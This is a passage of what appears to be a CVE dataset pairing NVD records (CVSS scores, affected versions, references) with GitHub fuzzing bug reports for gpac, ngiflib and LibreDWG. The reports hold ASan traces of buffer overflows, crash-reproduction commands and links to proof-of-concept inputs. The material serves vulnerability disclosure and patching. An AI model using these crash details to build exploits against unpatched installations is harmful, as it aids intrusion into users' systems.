gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x564b9ae72f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x564b9ae75bca in gf_isom_open_file isomedia/isom_intern.c:615 #6 0x564b9abbe852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #7 0x7f4b5d817b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x564b9abafb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) Address 0x7fff6e0d88d0 is located in stack of thread T0 at offset 1056 in frame #0 0x564b9b2d641f in dimC_Read isomedia/box_code_3gpp.c:983 This frame has 1 object(s): [32, 1056) 'str' <== Memory access at offset 1056 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow isomedia/box_code_3gpp.c:1000 in dimC_Read Shadow bytes around the buggy address: 0x10006dc130c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006dc13110: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 0x10006dc13120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13130: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 0x10006dc13140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13160: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3045==ABORTING ```
There is a stack-buffer-overflow in the dimC_Read function of box_code_3gpp.c:1000
https://api.github.com/repos/gpac/gpac/issues/1348/comments
2
2019-11-13T07:25:13Z
2020-01-08T12:45:44Z
https://github.com/gpac/gpac/issues/1348
522,010,451
1,348
CVE-2019-20219
2020-01-02T15:15:12.520
ngiflib 0.4 has a heap-based buffer over-read in GifIndexToTrueColor in ngiflib.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/miniupnp/ngiflib/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniupnp_project:ngiflib:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "5BE2BAA9-5D76-4039-A655-3F478ED5D601", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/miniupnp/ngiflib/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "miniupnp", "ngiflib" ]
Tested in Ubuntu 19.04, 64bit, ngiflib(master 2bef2a0) Triggered by gif2tga $POC POC file: [poc.zip](https://github.com/miniupnp/ngiflib/files/3723825/poc.zip) asan ``` root@ubuntu:/home/tim/ngiflib-normal# ./gif2tga mr_gland.gif-out_of_bound-idx\:0xf3-0x0.gif ================================================================= ==94158==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000162 at pc 0x5632b5984c7a bp 0x7ffd20267aa0 sp 0x7ffd20267a90 READ of size 1 at 0x604000000162 thread T0 #0 0x5632b5984c79 in GifIndexToTrueColor /home/tim/ngiflib-normal/ngiflib.c:842 #1 0x5632b5984ec8 in WritePixels /home/tim/ngiflib-normal/ngiflib.c:226 #2 0x5632b5987664 in DecodeGifImg /home/tim/ngiflib-normal/ngiflib.c:582 #3 0x5632b5988fb7 in LoadGif /home/tim/ngiflib-normal/ngiflib.c:823 #4 0x5632b5983f29 in main /home/tim/ngiflib-normal/gif2tga.c:95 #5 0x7fc810b42b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #6 0x5632b59832d9 in _start (/home/tim/ngiflib-normal/gif2tga+0x22d9) Address 0x604000000162 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/ngiflib-normal/ngiflib.c:842 in GifIndexToTrueColor Shadow bytes around the buggy address: 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==94158==ABORTING ```
heap-buffer-overflow at WritePixels() in ngiflib.c:226
https://api.github.com/repos/miniupnp/ngiflib/issues/15/comments
2
2019-10-14T09:40:20Z
2020-01-05T08:51:16Z
https://github.com/miniupnp/ngiflib/issues/15
506,545,294
15
CVE-2020-6609
2020-01-08T21:15:11.193
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in read_pages_map in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issue-544834443" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issue-544834443
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6610
2020-01-08T21:15:11.287
GNU LibreDWG 0.9.3.2564 has an attempted excessive memory allocation in read_sections_map in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*", "matchCriteriaId": "C84D9410-31B7-421A-AD99-8ED2E45A9BC6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447120
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6611
2020-01-08T21:15:11.367
GNU LibreDWG 0.9.3.2564 has a NULL pointer dereference in get_next_owned_entity in dwg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447190
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6612
2020-01-08T21:15:11.457
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in copy_compressed_bytes in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447169
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
